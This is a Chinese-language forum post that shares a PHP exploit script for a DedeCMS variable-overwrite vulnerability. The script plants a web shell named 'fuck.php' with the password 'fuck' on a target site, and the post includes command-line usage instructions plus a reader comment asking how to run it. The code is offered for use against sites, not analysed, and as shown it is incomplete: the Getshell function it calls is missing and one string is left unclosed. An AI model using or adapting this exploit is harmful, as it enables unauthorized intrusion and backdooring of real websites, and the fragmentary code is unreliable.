dedecms 变量覆盖 0day getshell 的一个 exp

dedecms 变量覆盖 0day getshell 的一个 exp （不久前的 exp好用发出来共享而已），By：黑小子。

dede 不久前爆的洞了不过这个exp还蛮实用的呵呵！

Exp：

#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]
);
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' [url]www.site.com[/url] 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "[*] Exploit Success \n";
if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;

if($aid==2)echo "[*] Shell:".$url."/$path/fuck.php\n" ;

if($aid==3)echo "[*] Shell:".$url."/$path/plus/fuck.php\n";

}else{
echo "[*] Exploit Failed \n";
}

搭建php环境 cmd下运行 dede.php php

dede.php lcx.cc 1 vul

第一个是网站第二个是 ID 第三个是路径

一句话密码为fuck

留言评论（旧系统）：

佚名 @ 2013-03-11 23:05:53

老大,求解释初学PHP 这个要怎么运行...PHP环境搭建了...就是不知道怎么运行

本站回复：

文中已写出说明。

文章目录